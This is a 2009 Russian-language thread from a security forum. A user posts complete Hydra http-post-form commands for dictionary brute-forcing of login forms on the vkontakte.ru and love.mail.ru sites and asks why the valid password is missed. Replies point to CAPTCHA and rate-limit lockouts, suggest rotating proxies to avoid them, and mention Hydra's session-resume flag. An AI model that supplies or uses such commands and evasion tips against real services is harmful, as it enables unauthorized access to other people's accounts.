вопрос по HYDRA. http-post-form

Discussion in 'Безопасность и Анонимность' started by -evil-, 6 Mar 2009.

  1. -evil-

    -evil- Banned

    Joined:
    22 Nov 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    всем привет...
    решил попробовать гидрой брутануть по словарю вконтакте...для теста создал тестовый аккаунт, создал файл с паролями (для теста в файл словарей засунул 10 пассов, в том числе и валидный) и тут прописываю hydra.exe -l [email protected] -P pass.txt -s 80 -f vkontakte.ru http-post-form "/index.php:email=^USER^&pass=^PASS^&submit=login:error" начинает вроде как брутить....но пропускает все время валидный пароль ((( объясните что делаю не так?
    З.Ы. Заранее благодарен
     
  2. syava

    syava Member

    Joined:
    4 Feb 2009
    Messages:
    16
    Likes Received:
    7
    Reputations:
    0
    там же капча после нескольких попыток
     
  3. -evil-

    -evil- Banned

    Joined:
    22 Nov 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    ok...допустим в контакте стоит капча...берем love.mail.ru через wap

    hydra.exe -l user -P pass.txt -s 80 -f wap.love.mail.ru http-post-form "/?area=login:login=^USER^&password=^PASS^&submitted=Войти:Неверный логин или пароль"
    те же самые качели...пробегает валидный пароль хоть ты тресни блин (((( хотя через wap защиты вроде никакой там нету....
    может я в команде гидры гдето затупил или в форму мамбы не правильно вытащил? посмотрите плиз....сенкс
     
    #3 -evil-, 6 Mar 2009
    Last edited: 6 Mar 2009
  4. -evil-

    -evil- Banned

    Joined:
    22 Nov 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    ауууу!!! ктото откликнется или как?
     
  5. funman

    funman New Member

    Joined:
    25 Jan 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    защита есть... после опреденного кол-ва запросов дает бан на определнное время, и в это время какой бы пароль не вводил , всегда будет не правильным, по этому и проскакивает...
     
  6. funman

    funman New Member

    Joined:
    25 Jan 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    как вариант через список хороших прокси можно попробовать, но как на гидре это работает незнаю
     
  7. aka_k4

    aka_k4 Member

    Joined:
    5 Feb 2009
    Messages:
    107
    Likes Received:
    30
    Reputations:
    0
    соре за археалогию, но сам долгое время занимался любовью с гидрой)

    проксей там нет, но есть -R - востановление сессии после сбоя